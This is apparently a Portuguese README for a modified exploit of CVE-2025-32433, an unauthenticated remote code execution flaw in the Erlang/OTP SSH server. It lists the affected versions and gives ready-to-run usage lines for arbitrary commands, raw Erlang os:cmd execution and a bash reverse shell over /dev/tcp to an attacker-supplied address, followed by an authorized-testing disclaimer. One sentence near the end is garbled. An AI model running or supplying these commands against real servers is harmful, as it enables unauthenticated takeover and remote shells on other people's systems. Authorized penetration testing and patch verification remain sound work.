
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility
Execução Remota de Código não Autenticada no SSH do Erlang/OTP
Este repositório contém uma exploração para CVE-2025-32433, uma vulnerabilidade crítica de execução remota de código não autenticada no servidor SSH do Erlang/OTP.
Características principais:
ID CVE: CVE-2025-32433
Gravidade: Crítica
Impacto: Execução Remota de Código não Autenticada
A vulnerabilidade permite que atacantes executem comandos arbitrários do sistema em servidores SSH do Erlang/OTP sem autenticação, enviando mensagens de protocolo SSH especialmente criadas.
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 e mais antigas (provável)
# Execução básica de comando
python exploit.py -t <ip-alvo> -p 2222 -c "whoami"
# Executar comando do sistema
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Execução de código Erlang bruto
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Shell reverso
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/SEU_IP/4444 0>&1"
-t, --target Endereço IP do alvo (padrão: 127.0.0.1)
-p, --port Porta do alvo (padrão: 2222)
-c, --command Comando do sistema a executar
-e, --erlang Código Erlang bruto a executar
Esta versão corrige o problema de codificação presente na exploração original:
Problema: A exploração original usava o caractere de marca de verificação Unicode (✓, U+2713) que causa erros de codificação GBK no Windows:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
Solução: Substituiu o caractere Unicode pelo caractere ASCII padrão + para compatibilidade entre plataformas.
A exploração funciona:
os:cmd()Esta exploração é fornecida apenas para fins educacionais e de teste de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use com responsabilidade e apenas em sistemas para os quais você tenha permissão explícita para testar.
Licença MIT
Modificado para compatibilidade com Windows por chuzouX